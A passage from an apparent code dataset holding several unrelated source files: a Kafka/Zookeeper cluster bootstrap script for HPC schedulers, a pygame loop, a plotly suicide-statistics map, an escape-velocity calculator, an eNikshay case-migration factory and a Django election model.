\"https://archive.apache.org/dist/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\nWORKING_DIRECTORY = os.path.join(os.getcwd())\n\n# For using an existing installation\nKAFKA_HOME = os.path.join(os.getcwd(), \"kafka-\" + VERSION)\nKAFKA_CONF_DIR = os.path.join(KAFKA_HOME, \"etc\")\n\nSTOP = False\n\n\ndef handler(signum, frame):\n    logging.debug(\"Signal caught. 
Stop Kafka\")\n global STOP\n STOP = True\n time.sleep(10)\n os.system(\"killall java\")\n sys.exit(0)\n\n\n\nclass KafkaBootstrap():\n\n def __init__(self, working_directory, kafka_home, config_name=\"default\", extension_job_id=None):\n self.working_directory = working_directory\n self.kafka_home = kafka_home\n self.config_name = config_name\n self.jobid = \"kafka-\" + str(uuid.uuid1())\n self.job_working_directory = os.path.join(WORKING_DIRECTORY)\n self.job_conf_dir = os.path.join(self.job_working_directory, \"config\")\n self.extension_job_id = extension_job_id\n self.broker_config_files = {}\n try:\n os.makedirs(self.job_conf_dir)\n os.system(\"rm -rf /tmp/zookeeper*\")\n os.system(\"rm -rf /tmp/kafka-logs*\")\n except:\n pass\n\n def get_server_properties(self, master, hostname, broker_id):\n module = \"pilot.plugins.kafka.configs.\" + self.config_name\n print((\"Access config in module: \" + module + \" File: server.properties\"))\n my_data = pkg_resources.resource_string(module, \"server.properties\").decode(\"utf-8\")\n # print(my_data)\n # Find out external IP\n external_ip = hostname\n try:\n # check whether this host has an external ip that should be used\n external_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')\n logging.debug(\"External IP discovered: {}\".format(external_ip))\n except:\n logging.debug(\"No external IP discovered.\")\n\n # have at least 4 Kafka log directories containing broker id in config template\n my_data = my_data % (broker_id, hostname, external_ip, broker_id, broker_id, broker_id, broker_id, master)\n my_data = os.path.expandvars(my_data)\n return my_data\n\n def get_zookeeper_properties(self, hostname):\n module = \"pilot.plugins.kafka.configs.\" + self.config_name\n logging.debug(\"Access config in module: \" + module + \" File: zookeeper.properties\")\n my_data = pkg_resources.resource_string(module, \"zookeeper.properties\").decode(\"utf-8\")\n return my_data\n\n #######################################################################################\n ## Get Node List from Resource Management System\n @staticmethod\n def get_pbs_allocated_nodes():\n print(\"Init PBS\")\n pbs_node_file = os.environ.get(\"PBS_NODEFILE\")\n if pbs_node_file == None:\n return [\"localhost\"]\n f = open(pbs_node_file)\n nodes = f.readlines()\n for i in nodes:\n i.strip()\n f.close()\n return list(set(nodes))\n\n @staticmethod\n def get_sge_allocated_nodes():\n logging.debug(\"Init SGE or Local\")\n sge_node_file = os.environ.get(\"PE_HOSTFILE\")\n if sge_node_file == None:\n return [\"localhost\"]\n f = open(sge_node_file)\n sgenodes = f.readlines()\n f.close()\n nodes = []\n for i in sgenodes:\n columns = i.split()\n try:\n for j in range(0, int(columns[1])):\n print((\"add host: \" + columns[0].strip()))\n nodes.append(columns[0] + \"\\n\")\n except:\n pass\n nodes.reverse()\n return list(set(nodes))\n\n @staticmethod\n def get_slurm_allocated_nodes():\n print(\"Init nodefile from SLURM_NODELIST\")\n hosts = os.environ.get(\"SLURM_NODELIST\")\n if hosts == None:\n return [\"localhost\"]\n\n print(\"***** Hosts: \" + str(hosts))\n hosts = hostlist.expand_hostlist(hosts)\n number_cpus_per_node = 1\n if os.environ.get(\"SLURM_CPUS_ON_NODE\") != None:\n number_cpus_per_node = int(os.environ.get(\"SLURM_CPUS_ON_NODE\"))\n freenodes = []\n for h in hosts:\n # for i in range(0, number_cpus_per_node):\n freenodes.append((h + \"\\n\"))\n return list(set(freenodes))\n\n @staticmethod\n def get_nodelist_from_resourcemanager():\n if 
(os.environ.get(\"PBS_NODEFILE\") != None and os.environ.get(\"PBS_NODEFILE\") != \"\"):\n nodes = KafkaBootstrap.get_pbs_allocated_nodes()\n elif (os.environ.get(\"SLURM_NODELIST\") != None):\n nodes = KafkaBootstrap.get_slurm_allocated_nodes()\n else:\n nodes = KafkaBootstrap.get_sge_allocated_nodes()\n return nodes\n\n #######################################################################################\n def configure_kafka(self):\n logging.debug(\"Kafka Instance Configuration Directory: \" + self.job_conf_dir)\n nodes = self.get_nodelist_from_resourcemanager()\n logging.debug(\"Kafka nodes: \" + str(nodes))\n master = socket.gethostname().split(\".\")[0]\n\n for idx, node in enumerate(nodes):\n path = os.path.join(self.job_conf_dir, \"broker-%d\" % idx)\n try:\n os.makedirs(path)\n except:\n pass #do nothing as path exists\n server_properties_filename = os.path.join(path, \"server.properties\")\n server_properties_file = open(server_properties_filename, \"w\")\n server_properties_file.write(\n self.get_server_properties(master=master, hostname=node.strip(), broker_id=idx))\n server_properties_file.close()\n self.broker_config_files[node] = server_properties_filename\n\n zookeeper_properties_file = open(os.path.join(self.job_conf_dir, \"zookeeper.properties\"), \"w\")\n zookeeper_properties_file.write(self.get_zookeeper_properties(master))\n zookeeper_properties_file.close()\n\n def start_kafka(self):\n logging.debug(\"Start Kafka\")\n os.system(\"killall -s 9 java\")\n os.system(\"pkill -9 java\")\n time.sleep(5)\n\n logging.debug(\"Start Zookeeper\")\n start_command = os.path.join(self.kafka_home, \"bin/zookeeper-server-start.sh\") + \" -daemon \" + os.path.join(\n self.job_conf_dir, \"zookeeper.properties\")\n logging.debug(\"Execute: %s\" % start_command)\n os.system(\". ~/.bashrc & \" + start_command)\n\n logging.debug(\"Start Kafka Cluster\")\n # remove dangling keys referencing localhost\n os.system(\"ssh-keygen -f $HOME/.ssh/known_hosts -R localhost\")\n for node in list(self.broker_config_files.keys()):\n config = self.broker_config_files[node]\n start_command = os.path.join(self.kafka_home, \"bin/kafka-server-start.sh\") + \" -daemon \" + config\n result = execute_ssh_command_as_daemon(node.strip(),\n user=None,\n command=start_command,\n keyfile=None)\n print(\"Host: {} Command: {} Result: {}\".format(node.strip(), start_command, result))\n #logging.debug(\"Execute: %s\" % start_command)\n #os.system(\". 
~/.bashrc & \" + start_command)\n\n print((\"Kafka started with configuration: %s\" % self.job_conf_dir))\n\n def check_kafka(self):\n brokers = {}\n try:\n master = socket.gethostname().split(\".\")[0]\n client = KafkaClient(zookeeper_hosts=master + \":2181\")\n brokers = client.brokers\n except:\n pass\n print(\"Found %d brokers: %s\" % (len(list(brokers.keys())), str(brokers)))\n return brokers\n\n def start(self):\n self.configure_kafka()\n self.start_kafka()\n\n ##################################################################################################################\n # Extend cluster\n def start_kafka_extension(self):\n logging.debug(\"Start Kafka\")\n os.system(\"killall -s 9 java\")\n os.system(\"pkill -9 java\")\n time.sleep(5)\n\n logging.debug(\"Start Kafka Cluster\")\n # remove dangling keys referencing localhost\n os.system(\"ssh-keygen -f $HOME/.ssh/known_hosts -R localhost\")\n\n for node in list(self.broker_config_files.keys()):\n config = self.broker_config_files[node]\n start_command = os.path.join(self.kafka_home, \"bin/kafka-server-start.sh\") + \" -daemon \" + config\n result = execute_ssh_command(node.strip(),\n user=None,\n command=start_command,\n keyfile=None)\n print(\"Host: {} Command: {} Result: {}\".format(node.strip(), start_command, result))\n\n #logging.debug(\"Execute: %s\" % start_command)\n #os.system(\". ~/.bashrc & \" + start_command)\n\n print((\"Kafka started with configuration: %s\" % self.job_conf_dir))\n\n def configure_kafka_extension(self):\n logging.debug(\"Kafka Instance Configuration Directory: \" + self.job_conf_dir)\n nodes = self.get_nodelist_from_resourcemanager()\n logging.debug(\"Kafka nodes: \" + str(nodes))\n master = self.find_parent_zookeeper()\n max_id = self.find_max_broker_id()\n for node in nodes:\n idx = max_id + 1\n path = os.path.join(self.job_conf_dir, \"broker-%d\" % idx)\n try:\n os.makedirs(path)\n except:\n pass # do nothing as path exist\n server_properties_filename = os.path.join(path, \"server.properties\")\n server_properties_file = open(server_properties_filename, \"w\")\n server_properties_file.write(\n self.get_server_properties(master=master, hostname=node.strip(), broker_id=idx))\n server_properties_file.close()\n self.broker_config_files[node] = server_properties_filename\n\n def find_max_broker_id(self):\n path_to_parent_kafka_configs = os.path.join(os.getcwd(), \"..\", self.extension_job_id, \"config\")\n files = os.listdir(path_to_parent_kafka_configs)\n max_id = 0\n for i in files:\n bid = 0\n try:\n bid = int(i[-1])\n except:\n pass\n if bid > max_id:\n max_id = bid\n return max_id\n\n def find_parent_zookeeper(self):\n path_to_parent_spark_job = os.path.join(os.getcwd(), \"..\", self.extension_job_id,\n \"config/broker-0/server.properties\")\n print(\"Master of Parent Cluster: %s\" % path_to_parent_spark_job)\n zk = None\n with open(path_to_parent_spark_job, \"r\") as config:\n lines = config.readlines()\n for line in lines:\n if line.startswith(\"zookeeper.connect=\"):\n zk = line.strip().split(\"=\")[1]\n zk = zk.split(\":\")[0]\n\n logging.debug(\"Parent Zookeeper: %s\" % zk)\n return zk\n\n def extend(self):\n self.configure_kafka_extension()\n self.start_kafka_extension()\n\n ##################################################################################################################\n # Stop\n def stop(self):\n self.stop_kafka()\n\n def stop_kafka(self):\n logging.debug(\"Stop Kafka\")\n self.set_env()\n stop_command = os.path.join(KAFKA_HOME, \"bin/kafka-server-stop.sh\")\n 
        os.system(stop_command)
logging.debug(\"Execute: %s\" % stop_command)\n stop_command = os.path.join(KAFKA_HOME, \"bin/zookeeper-server-stop.sh\")\n logging.debug(\"Execute: %s\" % stop_command)\n os.system(stop_command)\n\n ##################################################################################################################\n # Utils\n\n\n#########################################################\n# main #\n#########################################################\nif __name__ == \"__main__\":\n\n signal.signal(signal.SIGALRM, handler)\n signal.signal(signal.SIGABRT, handler)\n signal.signal(signal.SIGQUIT, handler)\n signal.signal(signal.SIGINT, handler)\n\n parser = OptionParser()\n parser.add_option(\"-s\", \"--start\", action=\"store_true\", dest=\"start\",\n help=\"start Kafka\", default=True)\n parser.add_option(\"-j\", \"--job\", type=\"string\", action=\"store\", dest=\"jobid\",\n help=\"Job ID of Kafka Cluster to Extend\")\n parser.add_option(\"-q\", \"--quit\", action=\"store_false\", dest=\"start\",\n help=\"terminate Hadoop\")\n parser.add_option(\"-c\", \"--clean\", action=\"store_true\", dest=\"clean\",\n help=\"clean Kafka topics in Zookeeper after termination\")\n\n parser.add_option(\"-n\", \"--config_name\", action=\"store\", type=\"string\", dest=\"config_name\", default=\"default\")\n # parser.add_option(\"-m\", \"--machines\", action=\"store\", type=\"string\", dest=\"config_name\")\n\n (options, args) = parser.parse_args()\n config_name = options.config_name\n logging.debug(\"Bootstrap Kafka on \" + socket.gethostname())\n\n node_list = KafkaBootstrap.get_nodelist_from_resourcemanager()\n number_nodes = len(node_list)\n print(\"nodes: %s\" % str(node_list))\n\n\n #################################################################################################################\n # Download Kafka\n run_timestamp = datetime.datetime.now()\n performance_trace_filename = \"kafka_performance_\" + run_timestamp.strftime(\"%Y%m%d-%H%M%S\") + \".csv\"\n kafka_config_filename = \"kafka_config_\" + run_timestamp.strftime(\"%Y%m%d-%H%M%S\")\n try:\n os.makedirs(WORKING_DIRECTORY)\n except:\n pass\n performance_trace_file = open(os.path.join(WORKING_DIRECTORY, performance_trace_filename), \"a\")\n start = time.time()\n # performance_trace_file.write(\"start_time, %.5f\"%(time.time()))\n\n filename = os.path.basename(KAFKA_DOWNLOAD_URL)\n kafka_home = \"\"\n if not os.path.exists(KAFKA_HOME):\n try:\n os.makedirs(WORKING_DIRECTORY)\n except:\n pass\n\n download_destination = os.path.join(WORKING_DIRECTORY, filename)\n if os.path.exists(download_destination) == False:\n logging.debug(\"Download: %s to %s\" % (KAFKA_DOWNLOAD_URL, download_destination))\n opener = urllib.request.FancyURLopener({})\n opener.retrieve(KAFKA_DOWNLOAD_URL, download_destination);\n else:\n logging.debug(\"Found existing Kafka binaries at: \" + download_destination)\n logging.debug(\"Install Kafka\")\n\n os.chdir(WORKING_DIRECTORY)\n os.system(\"tar -xzf %s\" % filename)\n kafka_home = os.path.join(WORKING_DIRECTORY, os.path.splitext(filename)[0])\n os.environ[\"KAFKA_HOME\"] = kafka_home\n\n end_download = time.time()\n performance_trace_file.write(\"download, %d, %.5f\\n\" % (number_nodes, end_download - start))\n performance_trace_file.flush()\n\n # initialize object for managing kafka clusters\n kafka = KafkaBootstrap(WORKING_DIRECTORY, kafka_home, config_name, options.jobid)\n if options.jobid is not None and options.jobid != \"None\":\n logging.debug(\"Extend Kafka Cluster with PS ID: %s\" % options.jobid)\n 
kafka.extend()\n end_start = time.time()\n performance_trace_file.write(\"startup-extension, %d, %.5f\\n\" % (number_nodes, (end_start - end_download)))\n performance_trace_file.flush()\n with open(\"kafka_started\", \"w\") as f:\n f.write(str(node_list))\n elif options.start:\n kafka.start()\n number_brokers = 0\n while number_brokers != number_nodes:\n brokers = kafka.check_kafka()\n number_brokers = len(list(brokers.values()))\n logging.debug(\"Number brokers: %d, number nodes: %d\" % (number_brokers, number_nodes))\n time.sleep(1)\n end_start = time.time()\n performance_trace_file.write(\"startup, %d, %.5f\\n\" % (number_nodes, (end_start - end_download)))\n performance_trace_file.flush()\n with open(\"kafka_started\", \"w\") as f:\n f.write(str(node_list))\n else:\n kafka.stop()\n if options.clean:\n directory = \"/tmp/zookeeper/\"\n logging.debug(\"delete: \" + directory)\n shutil.rmtree(directory)\n sys.exit(0)\n\n print(\"Finished launching of Kafka Cluster - Sleeping now\")\n\n while STOP == False:\n logging.debug(\"stop: \" + str(STOP))\n time.sleep(10)\n\n kafka.stop()\n os.remove(os.path.join(WORKING_DIRECTORY, \"kafka_started\"))\n performance_trace_file.write(\"total_runtime, %d, %.5f\\n\" % (number_nodes, time.time() - start))\n performance_trace_file.flush()\n performance_trace_file.close()\n","sub_path":"pilot/plugins/kafka/bootstrap_kafka.py","file_name":"bootstrap_kafka.py","file_ext":"py","file_size_in_byte":18008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"184301952","text":"from SpriteReader import SpriteReader\nfrom MapClasses.CollisionMap import CollisionMap\nfrom MapClasses.BackgroundMap import BackgroundMap\nimport pygame as pyg\nimport init\nfrom InputHandler import InputHandler\nfrom Renderer import Renderer\n\n\ndef main():\n maps = {\n \"collision_map\": CollisionMap(\"src\\maps\\starting_point.txt\"),\n \"background_map\": BackgroundMap()\n }\n screen, scene = init.game()\n running = True\n input_handler = InputHandler(scene, maps)\n sprites = SpriteReader()\n\n renderer = Renderer(screen, scene, maps, sprites)\n while running:\n\n main_loop(input_handler, scene, renderer, maps)\n\n\ndef main_loop(input_handler, scene, renderer, maps):\n\n # This checks for quit and changes scene.player_phsyics\n input_handler.get_events()\n scene.player_physics.update_pos(scene)\n renderer.paint()\n\n\nmain()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"129117667","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[85]:\n\n\nimport cufflinks as cf\nfrom plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot\nimport pandas as pd\nimport numpy as np\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go \n\ninit_notebook_mode(connected=True)\ncf.go_offline()\ndata1 = pd.read_csv(\"master.csv\")\n\nworldMeanSuicides = data1.groupby([\"country\"])[\"suicides_no\"].sum()\ndf1 = pd.DataFrame({\"country\" : worldMeanSuicides.index,\n \"year\" : worldMeanSuicides.values\n })\n\ndef show_values_on_bars(axs):\n def _show_on_single_plot(ax): \n for p in ax.patches:\n _x = p.get_x() + p.get_width() / 2\n _y = p.get_y() + p.get_height()\n value = '{:.2f}'.format(p.get_height())\n ax.text(_x, _y, value, ha=\"center\") \n\n if isinstance(axs, np.ndarray):\n for idx, ax in np.ndenumerate(axs):\n _show_on_single_plot(ax)\n else:\n 
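        # a single Axes object was passed in, so annotate its bars directly: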
        _show_on_single_plot(axs)\n\ndf = pd.DataFrame({\"year\" : worldMeanSuicides.index,\n                   \"suicides\" : worldMeanSuicides.values\n                  })\n\n\ndata = dict(type='choropleth',\n            locations = df1[\"country\"],\n            locationmode = \"country names\",\n            z = df1[\"year\"],\n            colorscale = [\n                [0, \"rgb(5, 10, 172)\"],\n                [0.35, \"rgb(40, 60, 190)\"],\n                [0.5, \"rgb(70, 100, 245)\"],\n                [0.6, \"rgb(90, 120, 245)\"],\n                [0.7, \"rgb(106, 137, 247)\"],\n                [1, \"rgb(220, 220, 220)\"]\n            ],\n            autocolorscale = False,\n            reversescale = True,\n            colorbar = {\"title\" : \"Number Of Suicides\"},\n            marker = go.choropleth.Marker(\n                line = go.choropleth.marker.Line(\n                    color = 'rgb(180,180,180)',\n                    width = 0.5\n                )),\n           )\n\nlayout = dict(\n    title = 'NUMBER OF SUICIDES PER COUNTRY SINCE 1987-2016',\n    geo = dict(\n        showframe = False,\n        projection = {'type' : \"natural earth\"} )\n)\n\nchoromap = go.Figure(data = [data], layout = layout)\n#iplot(choromap)\nplotly.offline.plot(choromap)\n","sub_path":"Suicides.py","file_name":"Suicides.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"587908071","text":"from math import *\n\n# standard gravity constant\ngravk = 6.67e-11\n\nmphk = 2236.9362\n\n# fev stands for find escape velocity\ndef fev(mass, dist):\n\tev = sqrt((2 * gravk * mass) / dist)\n\treturn ev\n\nif __name__ == \"__main__\":\n\tnumber_obj = int(input('Input the number of objects to use: '))\n\ti = 0\n\twhile i < number_obj:\n\t\tobj1_m = float(input('Input the mass of object 1 in kg: '))\n\t\tobj1_dkm = float(input('Input the distance from object 1 km: '))\n\t\tobj1_d = obj1_dkm * 1000\n\t\tobj1_ev = fev(obj1_m, obj1_d)/1000\n\n#\t\tobj2_m = float(input('Input the mass of object 2 kg: '))\n#\t\tobj2_dkm = float(input('Input the distance from object 2 km: '))\n#\t\tobj2_d = obj2_dkm * 1000\n#\t\tobj2_ev = fev(obj2_m, obj2_d)/1000\n\n\t\tprint('Escape Velocity of object 1 is ' + str(obj1_ev) + ' KM/s or ' + str(obj1_ev * mphk) + ' MPH')\n#\t\tprint('Escape Velocity of object 2 is ' + str(obj2_ev) + ' KM/s or ' + str(obj2_ev * mphk) + ' MPH')\n\t\ti += 1\n","sub_path":"old-cs111/labs/3/excape-vrepeat.py","file_name":"excape-vrepeat.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"148324256","text":"from datetime import date, datetime\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom casexml.apps.case.const import CASE_INDEX_EXTENSION\nfrom casexml.apps.case.mock import CaseStructure, CaseIndex\n\nfrom corehq.apps.locations.models import SQLLocation\nfrom custom.enikshay.private_sector_datamigration.models import (\n    Adherence,\n    Episode,\n    EpisodePrescription,\n    LabTest,\n)\n\nfrom dimagi.utils.decorators.memoized import memoized\n\nPERSON_CASE_TYPE = 'person'\nOCCURRENCE_CASE_TYPE = 'occurrence'\nEPISODE_CASE_TYPE = 'episode'\nADHERENCE_CASE_TYPE = 'adherence'\nPRESCRIPTION_CASE_TYPE = 'prescription'\nTEST_CASE_TYPE = 'test'\n\n\ndef get_human_friendly_id():\n    return datetime.utcnow().strftime('%Y%m%d%H%M%S%f')[:-3]\n\n\nclass BeneficiaryCaseFactory(object):\n\n    def __init__(self, domain, beneficiary):\n        self.domain = domain\n        self.beneficiary = beneficiary\n\n    def get_case_structures_to_create(self):\n        person_structure = self.get_person_case_structure()\n        occurrence_structure = self.get_occurrence_case_structure(person_structure)\n        episode_structure = self.get_episode_case_structure(occurrence_structure)\n        episode_descendants = 
[\n            self.get_adherence_case_structure(adherence, episode_structure)\n            for adherence in self._adherences\n        ] + [\n            self.get_prescription_case_structure(prescription, episode_structure)\n            for prescription in self._prescriptions\n        ]\n        episode_or_descendants = episode_descendants or [episode_structure]\n\n        tests = [\n            self.get_test_case_structure(labtest, occurrence_structure)\n            for labtest in self._labtests\n        ]\n\n        return episode_or_descendants + tests\n\n    def get_person_case_structure(self):\n        kwargs = {\n            'attrs': {\n                'case_type': PERSON_CASE_TYPE,\n                'close': False,\n                'create': True,\n                'update': {\n                    'current_address': self.beneficiary.current_address,\n                    'current_episode_type': self.beneficiary.current_episode_type,\n                    'dataset': 'real',\n                    'first_name': self.beneficiary.firstName,\n                    'last_name': self.beneficiary.lastName,\n                    'name': ' '.join([self.beneficiary.firstName, self.beneficiary.lastName]),\n                    'occupation': '',\n                    'phone_number': self.beneficiary.phoneNumber,\n                    'secondary_contact_phone_number': self.beneficiary.emergencyContactNo,\n\n                    'migration_created_case': 'true',\n                    'migration_created_from_record': self.beneficiary.caseId,\n                }\n            }\n        }\n\n        if self.beneficiary.age_entered is not None:\n            kwargs['attrs']['update']['age'] = self.beneficiary.age_entered\n            kwargs['attrs']['update']['age_entered'] = self.beneficiary.age_entered\n        else:\n            if self.beneficiary.dob is not None:\n                kwargs['attrs']['update']['age'] = relativedelta(\n                    self.beneficiary.creationDate, self.beneficiary.dob\n                ).years\n            else:\n                kwargs['attrs']['update']['age'] = ''\n            kwargs['attrs']['update']['age_entered'] = ''\n\n        if self.beneficiary.dob is not None:\n            kwargs['attrs']['update']['dob'] = self.beneficiary.dob.date()\n            kwargs['attrs']['update']['dob_known'] = 'yes'\n        else:\n            if self.beneficiary.age_entered is not None:\n                kwargs['attrs']['update']['dob'] = date(date.today().year - self.beneficiary.age_entered, 7, 1)\n            else:\n                kwargs['attrs']['update']['dob'] = ''\n            kwargs['attrs']['update']['dob_known'] = 'no'\n\n        if self.beneficiary.sex is not None:\n            kwargs['attrs']['update']['sex'] = self.beneficiary.sex\n\n        if self.beneficiary.has_aadhaar_number:\n            kwargs['attrs']['update']['aadhaar_number'] = self.beneficiary.identificationNumber\n        else:\n            kwargs['attrs']['update']['other_id_number'] = self.beneficiary.identificationNumber\n            kwargs['attrs']['update']['other_id_type'] = self.beneficiary.other_id_type\n\n        if self._episode:\n            kwargs['attrs']['update']['hiv_status'] = self._episode.hiv_status\n            kwargs['attrs']['update']['current_patient_type_choice'] = self._episode.current_patient_type_choice\n\n        agency = (\n            self._episode.treating_provider or self.beneficiary.referred_provider\n            if self._episode else self.beneficiary.referred_provider\n        )\n        assert agency is not None\n\n        kwargs['attrs']['owner_id'] = SQLLocation.active_objects.get(\n            domain=self.domain,\n            site_code=agency.nikshayId,\n        ).location_id\n\n        return CaseStructure(**kwargs)\n\n    def get_occurrence_case_structure(self, person_structure):\n        kwargs = {\n            'attrs': {\n                'case_type': OCCURRENCE_CASE_TYPE,\n                'close': False,\n                'create': True,\n                'owner_id': '-',\n                'update': {\n                    'current_episode_type': self.beneficiary.current_episode_type,\n                    'name': 'Occurrence #1',\n                    'occurrence_id': get_human_friendly_id(),\n\n                    'migration_created_case': 'true',\n                    'migration_created_from_record': self.beneficiary.caseId,\n                }\n            },\n            'indices': [CaseIndex(\n                person_structure,\n                identifier='host',\n                relationship=CASE_INDEX_EXTENSION,\n                related_type=PERSON_CASE_TYPE,\n            )],\n        }\n        return 
CaseStructure(**kwargs)\n\n def get_episode_case_structure(self, occurrence_structure):\n kwargs = {\n 'attrs': {\n 'case_type': EPISODE_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'adherence_schedule_id': 'schedule_mwf',\n 'date_of_mo_signature': self.beneficiary.dateOfRegn.date(),\n 'dots_99_enabled': 'false',\n 'episode_id': get_human_friendly_id(),\n 'episode_type': self.beneficiary.current_episode_type,\n 'name': self.beneficiary.episode_name,\n 'transfer_in': '',\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': self.beneficiary.caseId,\n }\n },\n 'indices': [CaseIndex(\n occurrence_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=OCCURRENCE_CASE_TYPE,\n )],\n }\n\n if self._episode:\n rx_start_date = self._episode.rxStartDate.date()\n kwargs['attrs']['date_opened'] = rx_start_date\n kwargs['attrs']['update']['adherence_schedule_date_start'] = rx_start_date\n kwargs['attrs']['update']['date_of_diagnosis'] = self._episode.dateOfDiagnosis.date()\n kwargs['attrs']['update']['disease_classification'] = self._episode.disease_classification\n kwargs['attrs']['update']['episode_pending_registration'] = (\n 'yes' if self._episode.nikshayID is None else 'no'\n )\n kwargs['attrs']['update']['treatment_card_completed_date'] = self._episode.creationDate.date()\n kwargs['attrs']['update']['treatment_initiated'] = 'yes_private'\n kwargs['attrs']['update']['treatment_initiation_date'] = rx_start_date\n kwargs['attrs']['update']['weight'] = int(self._episode.patientWeight)\n\n if self._episode.nikshayID:\n kwargs['attrs']['external_id'] = self._episode.nikshayID\n kwargs['attrs']['update']['nikshay_id'] = self._episode.nikshayID\n\n if self._episode.disease_classification == 'extra_pulmonary':\n kwargs['attrs']['update']['site_choice'] = self._episode.site_choice\n else:\n kwargs['attrs']['update']['episode_pending_registration'] = 'yes'\n kwargs['attrs']['update']['treatment_initiated'] = 'no'\n\n return CaseStructure(**kwargs)\n\n def get_adherence_case_structure(self, adherence, episode_structure):\n kwargs = {\n 'attrs': {\n 'case_type': ADHERENCE_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'adherence_date': adherence.doseDate.date(),\n 'adherence_value': adherence.adherence_value,\n 'name': adherence.doseDate.date(),\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': adherence.adherenceId,\n }\n },\n 'indices': [CaseIndex(\n episode_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=EPISODE_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n def get_prescription_case_structure(self, prescription, episode_structure):\n kwargs = {\n 'attrs': {\n 'case_type': PRESCRIPTION_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'name': prescription.productName,\n\n 'migration_created_case': 'true',\n 'migration_created_from_record': prescription.prescriptionID,\n }\n },\n 'indices': [CaseIndex(\n episode_structure,\n identifier='host',\n relationship=CASE_INDEX_EXTENSION,\n related_type=EPISODE_CASE_TYPE,\n )],\n }\n return CaseStructure(**kwargs)\n\n def get_test_case_structure(self, labtest, occurrence_structure):\n kwargs = {\n 'attrs': {\n 'case_type': TEST_CASE_TYPE,\n 'close': False,\n 'create': True,\n 'owner_id': '-',\n 'update': {\n 'migration_created_case': 'true',\n }\n },\n 'indices': [CaseIndex(\n occurrence_structure,\n identifier='host',\n 
                relationship=CASE_INDEX_EXTENSION,\n                related_type=OCCURRENCE_CASE_TYPE,\n            )],\n        }\n        return CaseStructure(**kwargs)\n\n    @property\n    @memoized\n    def _episode(self):\n        episodes = Episode.objects.filter(beneficiaryID=self.beneficiary).order_by('-episodeDisplayID')\n        if episodes:\n            return episodes[0]\n        else:\n            return None\n\n    @property\n    @memoized\n    def _adherences(self):\n        return list(Adherence.objects.filter(episodeId=self._episode)) if self._episode else []\n\n    @property\n    @memoized\n    def _prescriptions(self):\n        return list(EpisodePrescription.objects.filter(beneficiaryId=self.beneficiary))\n\n    @property\n    @memoized\n    def _labtests(self):\n        if self._episode:\n            return list(LabTest.objects.filter(episodeId=self._episode))\n        else:\n            return []\n","sub_path":"custom/enikshay/private_sector_datamigration/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"454211429","text":"from django.db import models\n\n# A place to hold information (about the candidates); in Django this is called a model.\n# Create your models here.\nclass Candidate(models.Model):\n    name = models.CharField(max_length=10)\n    introduction = models.TextField()\n    area = models.CharField(max_length=15)\n    party_number = models.IntegerField(default=0)  # the default value starts from 1.\n\n    def __str__(self):  # how this class should be represented when displayed\n        return self.name  # represent this class by the candidate's name; in the browser, the name stored in the DB is shown for each item.\n\n\nclass Poll2(models.Model):\n    start_date = models.DateTimeField()  # time the poll starts\n    end_date = models.DateTimeField()  # time the poll ends\n    area = models.CharField(max_length=15)  # region\n    # the id is generated automatically when the model is created.\n\n\nclass Choice4(models.Model):\n    # Use a ForeignKey when referencing another class; the on_delete argument must be supplied.\n    poll = models.ForeignKey(Poll2, on_delete=models.CASCADE)\n    candidate = models.ForeignKey(Candidate, on_delete=models.CASCADE)\n    votes = models.IntegerField(default=0)\n","sub_path":"elections/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"383061901","text":"#-*- coding: utf-8 -*-\nfrom five import grok\nfrom z3c.form import group, field\nfrom datetime import datetime\n\nfrom persistent.list import PersistentList\nfrom plone.dexterity.interfaces import IDexterityContent\n\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.lifecycleevent.interfaces import IObjectAddedEvent\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom Acquisition import aq_parent, aq_base, Implicit\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom zope.container.interfaces import INameChooser\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.utils import safe_unicode\n\nfrom zope.i18n import translate\nfrom zope.i18nmessageid import Message\nfrom zope.interface import implements\nfrom zope.lifecycleevent.interfaces import IObjectRemovedEvent\nfrom zope.component import adapter\nfrom zope.interface import implementer\n\nfrom emc.kb.contents.topic import Itopic\nfrom emc.kb.contents.question import Iquestion\nfrom emc.kb.contents.topicfolder import Itopicfolder\nfrom emc.kb.interfaces import IFollowedEvent\nfrom emc.kb.interfaces import IUnFollowedEvent\nfrom emc.kb.interfaces import IFollowing,IFollowable\nfrom emc.kb.interfaces import ICountNumEvent\nfrom emc.kb.interfaces import PROMOTIONS_PORTLET_COLUMN\nfrom 
